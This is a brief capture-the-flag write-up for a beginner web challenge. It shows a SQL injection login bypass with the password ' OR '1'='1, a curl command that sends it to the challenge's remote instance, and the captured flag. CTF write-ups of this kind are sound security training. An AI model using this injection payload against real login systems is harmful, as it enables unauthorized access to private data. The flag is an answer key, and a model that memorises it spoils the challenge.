Difficulty
babyCategories
webDescription
You discovered a login page for a company database system. The credentials are unknown, but you need to gain access to retrieve sensitive information.
Find a way to bypass the authentication and log in.
Author
xnull
Service
Challenge has a remote instance.
Solution
On the login page, we use the following credentials to get a login as admin:
- Username:
admin - Password:
' OR '1'='1
curl -s https://41f692a9-c318-4845-a218-9ac04a46109e.challs.qualifier.swiss-hacking-challenge.ch:1337/login -d "username=admin" -d "password=' OR '1'='1" \
| grep -o -E 'dach2026{.*}'
Flag:
dach2026{s1ngl3_qu0t3_1s_0n3_scary_b000y_94fa837c3d5f}